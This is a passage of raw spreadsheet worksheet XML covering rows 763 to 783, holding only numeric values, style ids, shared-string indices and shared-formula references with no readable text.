      <c r="V763" s="5"/>
      <c r="W763" s="47"/>
      <c r="X763" s="45"/>
      <c r="Y763" s="45"/>
      <c r="Z763" s="38" t="s">
        <v>3280</v>
      </c>
      <c r="AA763" s="39" t="s">
        <v>3281</v>
      </c>
      <c r="AB763" s="38" t="s">
        <v>3282</v>
      </c>
      <c r="AC763" s="40">
        <v>119635.0</v>
      </c>
      <c r="AD763" s="5"/>
      <c r="AE763" s="14"/>
      <c r="AF763" s="14"/>
    </row>
    <row r="764">
      <c r="A764" s="6">
        <f t="shared" si="1"/>
        <v>0.9627874219</v>
      </c>
      <c r="B764" s="29">
        <v>1.0</v>
      </c>
      <c r="C764" s="29">
        <v>237604.0</v>
      </c>
      <c r="D764" s="14"/>
      <c r="E764" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F764" s="14"/>
      <c r="G764" s="29">
        <v>2.0</v>
      </c>
      <c r="H764" s="29">
        <v>180.0</v>
      </c>
      <c r="I764" s="29">
        <v>241767.0</v>
      </c>
      <c r="J764" s="15"/>
      <c r="K764" s="29">
        <v>241767.0</v>
      </c>
      <c r="L764" s="15"/>
      <c r="M764" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N764" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O764" s="29">
        <v>1.0</v>
      </c>
      <c r="P764" s="29">
        <v>0.0</v>
      </c>
      <c r="Q764" s="15"/>
      <c r="R764" s="15"/>
      <c r="S764" s="15"/>
      <c r="T764" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U764" s="5"/>
      <c r="V764" s="5"/>
      <c r="W764" s="47"/>
      <c r="X764" s="45"/>
      <c r="Y764" s="45"/>
      <c r="Z764" s="38" t="s">
        <v>3283</v>
      </c>
      <c r="AA764" s="39" t="s">
        <v>3284</v>
      </c>
      <c r="AB764" s="38" t="s">
        <v>1584</v>
      </c>
      <c r="AC764" s="40">
        <v>237599.0</v>
      </c>
      <c r="AD764" s="5"/>
      <c r="AE764" s="14"/>
      <c r="AF764" s="14"/>
    </row>
    <row r="765">
      <c r="A765" s="6">
        <f t="shared" si="1"/>
        <v>0.966821711</v>
      </c>
      <c r="B765" s="29">
        <v>1.0</v>
      </c>
      <c r="C765" s="15"/>
      <c r="D765" s="14"/>
      <c r="E765" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F765" s="14"/>
      <c r="G765" s="29">
        <v>1.0</v>
      </c>
      <c r="H765" s="29">
        <v>227.0</v>
      </c>
      <c r="I765" s="29">
        <v>80516.0</v>
      </c>
      <c r="J765" s="15"/>
      <c r="K765" s="29">
        <v>80516.0</v>
      </c>
      <c r="L765" s="14"/>
      <c r="M765" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N765" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O765" s="29">
        <v>1.0</v>
      </c>
      <c r="P765" s="29">
        <v>2.0</v>
      </c>
      <c r="Q765" s="15"/>
      <c r="R765" s="15"/>
      <c r="S765" s="15"/>
      <c r="T765" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U765" s="5"/>
      <c r="V765" s="5"/>
      <c r="W765" s="47"/>
      <c r="X765" s="45"/>
      <c r="Y765" s="45"/>
      <c r="Z765" s="38" t="s">
        <v>3285</v>
      </c>
      <c r="AA765" s="39" t="s">
        <v>3286</v>
      </c>
      <c r="AB765" s="38" t="s">
        <v>3287</v>
      </c>
      <c r="AC765" s="40">
        <v>268557.0</v>
      </c>
      <c r="AD765" s="5"/>
      <c r="AE765" s="14"/>
      <c r="AF765" s="14"/>
    </row>
    <row r="766">
      <c r="A766" s="6">
        <f t="shared" si="1"/>
        <v>0.4143544419</v>
      </c>
      <c r="B766" s="29">
        <v>1.0</v>
      </c>
      <c r="C766" s="29">
        <v>52368.0</v>
      </c>
      <c r="D766" s="14"/>
      <c r="E766" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F766" s="14"/>
      <c r="G766" s="29">
        <v>171.0</v>
      </c>
      <c r="H766" s="29">
        <v>242643.0</v>
      </c>
      <c r="I766" s="29">
        <v>3272.0</v>
      </c>
      <c r="J766" s="15"/>
      <c r="K766" s="15"/>
      <c r="L766" s="14"/>
      <c r="M766" s="15"/>
      <c r="N766" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O766" s="29">
        <v>9.0</v>
      </c>
      <c r="P766" s="29">
        <v>20.0</v>
      </c>
      <c r="Q766" s="15"/>
      <c r="R766" s="15"/>
      <c r="S766" s="15"/>
      <c r="T766" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U766" s="5"/>
      <c r="V766" s="5"/>
      <c r="W766" s="47"/>
      <c r="X766" s="45"/>
      <c r="Y766" s="45"/>
      <c r="Z766" s="38" t="s">
        <v>3288</v>
      </c>
      <c r="AA766" s="39" t="s">
        <v>3289</v>
      </c>
      <c r="AB766" s="38" t="s">
        <v>3290</v>
      </c>
      <c r="AC766" s="40">
        <v>52361.0</v>
      </c>
      <c r="AD766" s="5"/>
      <c r="AE766" s="14"/>
      <c r="AF766" s="14"/>
    </row>
    <row r="767">
      <c r="A767" s="6">
        <f t="shared" si="1"/>
        <v>0.2142442114</v>
      </c>
      <c r="B767" s="29">
        <v>1.0</v>
      </c>
      <c r="C767" s="14"/>
      <c r="D767" s="14"/>
      <c r="E767" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F767" s="14"/>
      <c r="G767" s="29">
        <v>1.0</v>
      </c>
      <c r="H767" s="29">
        <v>113.0</v>
      </c>
      <c r="I767" s="29">
        <v>86410.0</v>
      </c>
      <c r="J767" s="15"/>
      <c r="K767" s="29">
        <v>-1.0</v>
      </c>
      <c r="L767" s="15"/>
      <c r="M767" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N767" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O767" s="29">
        <v>1.0</v>
      </c>
      <c r="P767" s="29">
        <v>1.0</v>
      </c>
      <c r="Q767" s="15"/>
      <c r="R767" s="15"/>
      <c r="S767" s="15"/>
      <c r="T767" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U767" s="5"/>
      <c r="V767" s="5"/>
      <c r="W767" s="47"/>
      <c r="X767" s="45"/>
      <c r="Y767" s="45"/>
      <c r="Z767" s="38" t="s">
        <v>3291</v>
      </c>
      <c r="AA767" s="39" t="s">
        <v>3292</v>
      </c>
      <c r="AB767" s="38" t="s">
        <v>3293</v>
      </c>
      <c r="AC767" s="40">
        <v>103491.0</v>
      </c>
      <c r="AD767" s="5"/>
      <c r="AE767" s="14"/>
      <c r="AF767" s="14"/>
    </row>
    <row r="768">
      <c r="A768" s="6">
        <f t="shared" si="1"/>
        <v>0.6397976918</v>
      </c>
      <c r="B768" s="29">
        <v>1.0</v>
      </c>
      <c r="C768" s="14"/>
      <c r="D768" s="14"/>
      <c r="E768" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F768" s="14"/>
      <c r="G768" s="29">
        <v>0.0</v>
      </c>
      <c r="H768" s="29">
        <v>315.0</v>
      </c>
      <c r="I768" s="29">
        <v>39465.0</v>
      </c>
      <c r="J768" s="15"/>
      <c r="K768" s="15"/>
      <c r="L768" s="15"/>
      <c r="M768" s="15"/>
      <c r="N768" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O768" s="29">
        <v>1.0</v>
      </c>
      <c r="P768" s="29">
        <v>0.0</v>
      </c>
      <c r="Q768" s="15"/>
      <c r="R768" s="15"/>
      <c r="S768" s="15"/>
      <c r="T768" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U768" s="5"/>
      <c r="V768" s="5"/>
      <c r="W768" s="47"/>
      <c r="X768" s="45"/>
      <c r="Y768" s="45"/>
      <c r="Z768" s="38" t="s">
        <v>3294</v>
      </c>
      <c r="AA768" s="39" t="s">
        <v>3295</v>
      </c>
      <c r="AB768" s="38" t="s">
        <v>3296</v>
      </c>
      <c r="AC768" s="40">
        <v>50906.0</v>
      </c>
      <c r="AD768" s="5"/>
      <c r="AE768" s="14"/>
      <c r="AF768" s="14"/>
    </row>
    <row r="769">
      <c r="A769" s="6">
        <f t="shared" si="1"/>
        <v>0.1034706562</v>
      </c>
      <c r="B769" s="29">
        <v>1.0</v>
      </c>
      <c r="C769" s="29">
        <v>245292.0</v>
      </c>
      <c r="D769" s="14"/>
      <c r="E769" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F769" s="14"/>
      <c r="G769" s="29">
        <v>1.0</v>
      </c>
      <c r="H769" s="29">
        <v>189.0</v>
      </c>
      <c r="I769" s="29">
        <v>156504.0</v>
      </c>
      <c r="J769" s="15"/>
      <c r="K769" s="15"/>
      <c r="L769" s="15"/>
      <c r="M769" s="15"/>
      <c r="N769" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O769" s="29">
        <v>1.0</v>
      </c>
      <c r="P769" s="29">
        <v>0.0</v>
      </c>
      <c r="Q769" s="15"/>
      <c r="R769" s="15"/>
      <c r="S769" s="15"/>
      <c r="T769" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U769" s="5"/>
      <c r="V769" s="5"/>
      <c r="W769" s="47"/>
      <c r="X769" s="45"/>
      <c r="Y769" s="45"/>
      <c r="Z769" s="38" t="s">
        <v>3297</v>
      </c>
      <c r="AA769" s="39" t="s">
        <v>3298</v>
      </c>
      <c r="AB769" s="38" t="s">
        <v>3299</v>
      </c>
      <c r="AC769" s="40">
        <v>245286.0</v>
      </c>
      <c r="AD769" s="5"/>
      <c r="AE769" s="14"/>
      <c r="AF769" s="14"/>
    </row>
    <row r="770">
      <c r="A770" s="6">
        <f t="shared" si="1"/>
        <v>0.6248621116</v>
      </c>
      <c r="B770" s="29">
        <v>1.0</v>
      </c>
      <c r="C770" s="29">
        <v>157535.0</v>
      </c>
      <c r="D770" s="14"/>
      <c r="E770" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F770" s="14"/>
      <c r="G770" s="29">
        <v>5.0</v>
      </c>
      <c r="H770" s="29">
        <v>493.0</v>
      </c>
      <c r="I770" s="29">
        <v>88718.0</v>
      </c>
      <c r="J770" s="15"/>
      <c r="K770" s="29">
        <v>98538.0</v>
      </c>
      <c r="L770" s="15"/>
      <c r="M770" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N770" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O770" s="29">
        <v>1.0</v>
      </c>
      <c r="P770" s="29">
        <v>6.0</v>
      </c>
      <c r="Q770" s="15"/>
      <c r="R770" s="15"/>
      <c r="S770" s="15"/>
      <c r="T770" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U770" s="5"/>
      <c r="V770" s="5"/>
      <c r="W770" s="47"/>
      <c r="X770" s="45"/>
      <c r="Y770" s="45"/>
      <c r="Z770" s="38" t="s">
        <v>3300</v>
      </c>
      <c r="AA770" s="39" t="s">
        <v>3301</v>
      </c>
      <c r="AB770" s="38" t="s">
        <v>3302</v>
      </c>
      <c r="AC770" s="40">
        <v>157278.0</v>
      </c>
      <c r="AD770" s="5"/>
      <c r="AE770" s="14"/>
      <c r="AF770" s="14"/>
    </row>
    <row r="771">
      <c r="A771" s="6">
        <f t="shared" si="1"/>
        <v>0.7852885661</v>
      </c>
      <c r="B771" s="29">
        <v>1.0</v>
      </c>
      <c r="C771" s="15"/>
      <c r="D771" s="14"/>
      <c r="E771" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F771" s="14"/>
      <c r="G771" s="29">
        <v>0.0</v>
      </c>
      <c r="H771" s="29">
        <v>133.0</v>
      </c>
      <c r="I771" s="29">
        <v>294026.0</v>
      </c>
      <c r="J771" s="15"/>
      <c r="K771" s="15"/>
      <c r="L771" s="15"/>
      <c r="M771" s="15"/>
      <c r="N771" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O771" s="29">
        <v>1.0</v>
      </c>
      <c r="P771" s="29">
        <v>6.0</v>
      </c>
      <c r="Q771" s="15"/>
      <c r="R771" s="15"/>
      <c r="S771" s="15"/>
      <c r="T771" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U771" s="5"/>
      <c r="V771" s="5"/>
      <c r="W771" s="47"/>
      <c r="X771" s="45"/>
      <c r="Y771" s="45"/>
      <c r="Z771" s="38" t="s">
        <v>3303</v>
      </c>
      <c r="AA771" s="39" t="s">
        <v>3304</v>
      </c>
      <c r="AB771" s="38" t="s">
        <v>3305</v>
      </c>
      <c r="AC771" s="40">
        <v>270676.0</v>
      </c>
      <c r="AD771" s="5"/>
      <c r="AE771" s="14"/>
      <c r="AF771" s="14"/>
    </row>
    <row r="772">
      <c r="A772" s="6">
        <f t="shared" si="1"/>
        <v>0.5569406508</v>
      </c>
      <c r="B772" s="29">
        <v>1.0</v>
      </c>
      <c r="C772" s="29">
        <v>199143.0</v>
      </c>
      <c r="D772" s="14"/>
      <c r="E772" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F772" s="14"/>
      <c r="G772" s="29">
        <v>1.0</v>
      </c>
      <c r="H772" s="29">
        <v>188.0</v>
      </c>
      <c r="I772" s="29">
        <v>89214.0</v>
      </c>
      <c r="J772" s="15"/>
      <c r="K772" s="15"/>
      <c r="L772" s="15"/>
      <c r="M772" s="15"/>
      <c r="N772" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O772" s="29">
        <v>1.0</v>
      </c>
      <c r="P772" s="29">
        <v>1.0</v>
      </c>
      <c r="Q772" s="15"/>
      <c r="R772" s="15"/>
      <c r="S772" s="15"/>
      <c r="T772" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U772" s="5"/>
      <c r="V772" s="5"/>
      <c r="W772" s="47"/>
      <c r="X772" s="45"/>
      <c r="Y772" s="45"/>
      <c r="Z772" s="38" t="s">
        <v>3306</v>
      </c>
      <c r="AA772" s="39" t="s">
        <v>3307</v>
      </c>
      <c r="AB772" s="38" t="s">
        <v>3308</v>
      </c>
      <c r="AC772" s="40">
        <v>199136.0</v>
      </c>
      <c r="AD772" s="5"/>
      <c r="AE772" s="14"/>
      <c r="AF772" s="14"/>
    </row>
    <row r="773">
      <c r="A773" s="6">
        <f t="shared" si="1"/>
        <v>0.1532514685</v>
      </c>
      <c r="B773" s="29">
        <v>1.0</v>
      </c>
      <c r="C773" s="15"/>
      <c r="D773" s="14"/>
      <c r="E773" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F773" s="14"/>
      <c r="G773" s="29">
        <v>13.0</v>
      </c>
      <c r="H773" s="29">
        <v>4018.0</v>
      </c>
      <c r="I773" s="29">
        <v>150909.0</v>
      </c>
      <c r="J773" s="15"/>
      <c r="K773" s="29">
        <v>150909.0</v>
      </c>
      <c r="L773" s="15"/>
      <c r="M773" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N773" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O773" s="29">
        <v>1.0</v>
      </c>
      <c r="P773" s="29">
        <v>3.0</v>
      </c>
      <c r="Q773" s="15"/>
      <c r="R773" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S773" s="15"/>
      <c r="T773" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U773" s="5"/>
      <c r="V773" s="5"/>
      <c r="W773" s="47"/>
      <c r="X773" s="45"/>
      <c r="Y773" s="45"/>
      <c r="Z773" s="38" t="s">
        <v>3309</v>
      </c>
      <c r="AA773" s="39" t="s">
        <v>3310</v>
      </c>
      <c r="AB773" s="38" t="s">
        <v>3311</v>
      </c>
      <c r="AC773" s="40">
        <v>161938.0</v>
      </c>
      <c r="AD773" s="5"/>
      <c r="AE773" s="14"/>
      <c r="AF773" s="14"/>
    </row>
    <row r="774">
      <c r="A774" s="6">
        <f t="shared" si="1"/>
        <v>0.382320142</v>
      </c>
      <c r="B774" s="29">
        <v>1.0</v>
      </c>
      <c r="C774" s="29">
        <v>49219.0</v>
      </c>
      <c r="D774" s="14"/>
      <c r="E774" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F774" s="14"/>
      <c r="G774" s="29">
        <v>13.0</v>
      </c>
      <c r="H774" s="29">
        <v>19911.0</v>
      </c>
      <c r="I774" s="29">
        <v>11332.0</v>
      </c>
      <c r="J774" s="15"/>
      <c r="K774" s="29">
        <v>-1.0</v>
      </c>
      <c r="L774" s="15"/>
      <c r="M774" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N774" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O774" s="29">
        <v>3.0</v>
      </c>
      <c r="P774" s="29">
        <v>9.0</v>
      </c>
      <c r="Q774" s="15"/>
      <c r="R774" s="15"/>
      <c r="S774" s="15"/>
      <c r="T774" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U774" s="5"/>
      <c r="V774" s="5"/>
      <c r="W774" s="47"/>
      <c r="X774" s="45"/>
      <c r="Y774" s="45"/>
      <c r="Z774" s="38" t="s">
        <v>3312</v>
      </c>
      <c r="AA774" s="39" t="s">
        <v>3313</v>
      </c>
      <c r="AB774" s="38" t="s">
        <v>3314</v>
      </c>
      <c r="AC774" s="40">
        <v>49200.0</v>
      </c>
      <c r="AD774" s="5"/>
      <c r="AE774" s="14"/>
      <c r="AF774" s="14"/>
    </row>
    <row r="775">
      <c r="A775" s="6">
        <f t="shared" si="1"/>
        <v>0.6756553452</v>
      </c>
      <c r="B775" s="29">
        <v>1.0</v>
      </c>
      <c r="C775" s="14"/>
      <c r="D775" s="14"/>
      <c r="E775" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F775" s="14"/>
      <c r="G775" s="29">
        <v>1.0</v>
      </c>
      <c r="H775" s="29">
        <v>835.0</v>
      </c>
      <c r="I775" s="29">
        <v>34809.0</v>
      </c>
      <c r="J775" s="15"/>
      <c r="K775" s="29">
        <v>-1.0</v>
      </c>
      <c r="L775" s="15"/>
      <c r="M775" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N775" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O775" s="29">
        <v>1.0</v>
      </c>
      <c r="P775" s="29">
        <v>2.0</v>
      </c>
      <c r="Q775" s="15"/>
      <c r="R775" s="15"/>
      <c r="S775" s="15"/>
      <c r="T775" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U775" s="5"/>
      <c r="V775" s="5"/>
      <c r="W775" s="47"/>
      <c r="X775" s="45"/>
      <c r="Y775" s="45"/>
      <c r="Z775" s="38" t="s">
        <v>3315</v>
      </c>
      <c r="AA775" s="39" t="s">
        <v>3316</v>
      </c>
      <c r="AB775" s="38" t="s">
        <v>3317</v>
      </c>
      <c r="AC775" s="40">
        <v>46192.0</v>
      </c>
      <c r="AD775" s="5"/>
      <c r="AE775" s="14"/>
      <c r="AF775" s="14"/>
    </row>
    <row r="776">
      <c r="A776" s="6">
        <f t="shared" si="1"/>
        <v>0.02926521983</v>
      </c>
      <c r="B776" s="29">
        <v>1.0</v>
      </c>
      <c r="C776" s="29">
        <v>57426.0</v>
      </c>
      <c r="D776" s="14"/>
      <c r="E776" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F776" s="14"/>
      <c r="G776" s="29">
        <v>-2.0</v>
      </c>
      <c r="H776" s="29">
        <v>143.0</v>
      </c>
      <c r="I776" s="29">
        <v>46140.0</v>
      </c>
      <c r="J776" s="15"/>
      <c r="K776" s="15"/>
      <c r="L776" s="15"/>
      <c r="M776" s="15"/>
      <c r="N776" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O776" s="29">
        <v>2.0</v>
      </c>
      <c r="P776" s="29">
        <v>0.0</v>
      </c>
      <c r="Q776" s="15"/>
      <c r="R776" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S776" s="15"/>
      <c r="T776" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U776" s="5"/>
      <c r="V776" s="5"/>
      <c r="W776" s="47"/>
      <c r="X776" s="45"/>
      <c r="Y776" s="45"/>
      <c r="Z776" s="38" t="s">
        <v>3318</v>
      </c>
      <c r="AA776" s="39" t="s">
        <v>3319</v>
      </c>
      <c r="AB776" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC776" s="40">
        <v>57425.0</v>
      </c>
      <c r="AD776" s="5"/>
      <c r="AE776" s="14"/>
      <c r="AF776" s="14"/>
    </row>
    <row r="777">
      <c r="A777" s="6">
        <f t="shared" si="1"/>
        <v>0.5292655519</v>
      </c>
      <c r="B777" s="29">
        <v>1.0</v>
      </c>
      <c r="C777" s="15"/>
      <c r="D777" s="14"/>
      <c r="E777" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F777" s="14"/>
      <c r="G777" s="29">
        <v>0.0</v>
      </c>
      <c r="H777" s="29">
        <v>245.0</v>
      </c>
      <c r="I777" s="29">
        <v>237351.0</v>
      </c>
      <c r="J777" s="15"/>
      <c r="K777" s="29">
        <v>6253.0</v>
      </c>
      <c r="L777" s="15"/>
      <c r="M777" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N777" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O777" s="29">
        <v>1.0</v>
      </c>
      <c r="P777" s="29">
        <v>3.0</v>
      </c>
      <c r="Q777" s="15"/>
      <c r="R777" s="15"/>
      <c r="S777" s="15"/>
      <c r="T777" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U777" s="5"/>
      <c r="V777" s="5"/>
      <c r="W777" s="47"/>
      <c r="X777" s="45"/>
      <c r="Y777" s="45"/>
      <c r="Z777" s="38" t="s">
        <v>3320</v>
      </c>
      <c r="AA777" s="39" t="s">
        <v>3321</v>
      </c>
      <c r="AB777" s="38" t="s">
        <v>1562</v>
      </c>
      <c r="AC777" s="40">
        <v>233829.0</v>
      </c>
      <c r="AD777" s="5"/>
      <c r="AE777" s="14"/>
      <c r="AF777" s="14"/>
    </row>
    <row r="778">
      <c r="A778" s="6">
        <f t="shared" si="1"/>
        <v>0.3897652037</v>
      </c>
      <c r="B778" s="29">
        <v>1.0</v>
      </c>
      <c r="C778" s="15"/>
      <c r="D778" s="14"/>
      <c r="E778" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F778" s="14"/>
      <c r="G778" s="29">
        <v>1.0</v>
      </c>
      <c r="H778" s="29">
        <v>8880.0</v>
      </c>
      <c r="I778" s="29">
        <v>104787.0</v>
      </c>
      <c r="J778" s="15"/>
      <c r="K778" s="15"/>
      <c r="L778" s="15"/>
      <c r="M778" s="15"/>
      <c r="N778" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O778" s="29">
        <v>3.0</v>
      </c>
      <c r="P778" s="29">
        <v>2.0</v>
      </c>
      <c r="Q778" s="15"/>
      <c r="R778" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S778" s="15"/>
      <c r="T778" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U778" s="5"/>
      <c r="V778" s="5"/>
      <c r="W778" s="47"/>
      <c r="X778" s="45"/>
      <c r="Y778" s="45"/>
      <c r="Z778" s="38" t="s">
        <v>3322</v>
      </c>
      <c r="AA778" s="39" t="s">
        <v>3323</v>
      </c>
      <c r="AB778" s="38" t="s">
        <v>3324</v>
      </c>
      <c r="AC778" s="40">
        <v>130794.0</v>
      </c>
      <c r="AD778" s="5"/>
      <c r="AE778" s="14"/>
      <c r="AF778" s="14"/>
    </row>
    <row r="779">
      <c r="A779" s="6">
        <f t="shared" si="1"/>
        <v>0.9138835993</v>
      </c>
      <c r="B779" s="29">
        <v>1.0</v>
      </c>
      <c r="C779" s="29">
        <v>81043.0</v>
      </c>
      <c r="D779" s="14"/>
      <c r="E779" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F779" s="14"/>
      <c r="G779" s="29">
        <v>8.0</v>
      </c>
      <c r="H779" s="29">
        <v>9979.0</v>
      </c>
      <c r="I779" s="29">
        <v>67813.0</v>
      </c>
      <c r="J779" s="15"/>
      <c r="K779" s="15"/>
      <c r="L779" s="15"/>
      <c r="M779" s="15"/>
      <c r="N779" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O779" s="29">
        <v>4.0</v>
      </c>
      <c r="P779" s="29">
        <v>1.0</v>
      </c>
      <c r="Q779" s="15"/>
      <c r="R779" s="15"/>
      <c r="S779" s="15"/>
      <c r="T779" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U779" s="5"/>
      <c r="V779" s="5"/>
      <c r="W779" s="45"/>
      <c r="X779" s="45"/>
      <c r="Y779" s="45"/>
      <c r="Z779" s="38" t="s">
        <v>3325</v>
      </c>
      <c r="AA779" s="39" t="s">
        <v>3326</v>
      </c>
      <c r="AB779" s="38" t="s">
        <v>3327</v>
      </c>
      <c r="AC779" s="40">
        <v>81004.0</v>
      </c>
      <c r="AD779" s="5"/>
      <c r="AE779" s="14"/>
      <c r="AF779" s="14"/>
    </row>
    <row r="780">
      <c r="A780" s="6">
        <f t="shared" si="1"/>
        <v>0.3337119442</v>
      </c>
      <c r="B780" s="29">
        <v>1.0</v>
      </c>
      <c r="C780" s="29">
        <v>92241.0</v>
      </c>
      <c r="D780" s="14"/>
      <c r="E780" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F780" s="14"/>
      <c r="G780" s="29">
        <v>1.0</v>
      </c>
      <c r="H780" s="29">
        <v>257.0</v>
      </c>
      <c r="I780" s="29">
        <v>79211.0</v>
      </c>
      <c r="J780" s="15"/>
      <c r="K780" s="29">
        <v>5405.0</v>
      </c>
      <c r="L780" s="15"/>
      <c r="M780" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N780" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O780" s="29">
        <v>1.0</v>
      </c>
      <c r="P780" s="29">
        <v>0.0</v>
      </c>
      <c r="Q780" s="15"/>
      <c r="R780" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S780" s="15"/>
      <c r="T780" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U780" s="5"/>
      <c r="V780" s="5"/>
      <c r="W780" s="47"/>
      <c r="X780" s="45"/>
      <c r="Y780" s="45"/>
      <c r="Z780" s="38" t="s">
        <v>3328</v>
      </c>
      <c r="AA780" s="39" t="s">
        <v>3329</v>
      </c>
      <c r="AB780" s="38" t="s">
        <v>3330</v>
      </c>
      <c r="AC780" s="40">
        <v>92230.0</v>
      </c>
      <c r="AD780" s="5"/>
      <c r="AE780" s="14"/>
      <c r="AF780" s="14"/>
    </row>
    <row r="781">
      <c r="A781" s="6">
        <f t="shared" si="1"/>
        <v>0.6387007609</v>
      </c>
      <c r="B781" s="29">
        <v>1.0</v>
      </c>
      <c r="C781" s="29">
        <v>186015.0</v>
      </c>
      <c r="D781" s="14"/>
      <c r="E781" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F781" s="14"/>
      <c r="G781" s="29">
        <v>2.0</v>
      </c>
      <c r="H781" s="29">
        <v>175.0</v>
      </c>
      <c r="I781" s="29">
        <v>150640.0</v>
      </c>
      <c r="J781" s="15"/>
      <c r="K781" s="15"/>
      <c r="L781" s="15"/>
      <c r="M781" s="14"/>
      <c r="N781" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O781" s="29">
        <v>1.0</v>
      </c>
      <c r="P781" s="29">
        <v>0.0</v>
      </c>
      <c r="Q781" s="15"/>
      <c r="R781" s="15"/>
      <c r="S781" s="15"/>
      <c r="T781" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U781" s="5"/>
      <c r="V781" s="5"/>
      <c r="W781" s="47"/>
      <c r="X781" s="45"/>
      <c r="Y781" s="45"/>
      <c r="Z781" s="38" t="s">
        <v>3331</v>
      </c>
      <c r="AA781" s="39" t="s">
        <v>3332</v>
      </c>
      <c r="AB781" s="38" t="s">
        <v>3333</v>
      </c>
      <c r="AC781" s="40">
        <v>185801.0</v>
      </c>
      <c r="AD781" s="5"/>
      <c r="AE781" s="14"/>
      <c r="AF781" s="14"/>
    </row>
    <row r="782">
      <c r="A782" s="6">
        <f t="shared" si="1"/>
        <v>0.6277598677</v>
      </c>
      <c r="B782" s="29">
        <v>1.0</v>
      </c>
      <c r="C782" s="14"/>
      <c r="D782" s="14"/>
      <c r="E782" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F782" s="14"/>
      <c r="G782" s="29">
        <v>1.0</v>
      </c>
      <c r="H782" s="29">
        <v>130.0</v>
      </c>
      <c r="I782" s="29">
        <v>169187.0</v>
      </c>
      <c r="J782" s="15"/>
      <c r="K782" s="29">
        <v>-1.0</v>
      </c>
      <c r="L782" s="15"/>
      <c r="M782" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N782" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O782" s="29">
        <v>2.0</v>
      </c>
      <c r="P782" s="29">
        <v>2.0</v>
      </c>
      <c r="Q782" s="15"/>
      <c r="R782" s="15"/>
      <c r="S782" s="15"/>
      <c r="T782" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U782" s="5"/>
      <c r="V782" s="5"/>
      <c r="W782" s="47"/>
      <c r="X782" s="45"/>
      <c r="Y782" s="45"/>
      <c r="Z782" s="38" t="s">
        <v>3334</v>
      </c>
      <c r="AA782" s="39" t="s">
        <v>3335</v>
      </c>
      <c r="AB782" s="38" t="s">
        <v>2485</v>
      </c>
      <c r="AC782" s="40">
        <v>178284.0</v>
      </c>
      <c r="AD782" s="5"/>
      <c r="AE782" s="14"/>
      <c r="AF782" s="14"/>
    </row>
    <row r="783">
      <c r="A783" s="6">
        <f t="shared" si="1"/>
        <v>0.03134883028</v>
      </c>
      <c r="B783" s="29">
        <v>1.0</v>
      </c>
      <c r="C783" s="29">
        <v>204771.0</v>
      </c>
      <c r="D783" s="14"/>
      <c r="E783" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F783" s="14"/>
      <c r="G783" s="29">
        <v>125.0</v>
      </c>
      <c r="H783" s="29">
        <v>18961.0</v>
      </c>
      <c r="I783" s="29">
        <v>76285.0</v>
      </c>
      <c r="J783" s="15"/>
      <c r="K783" s="29">
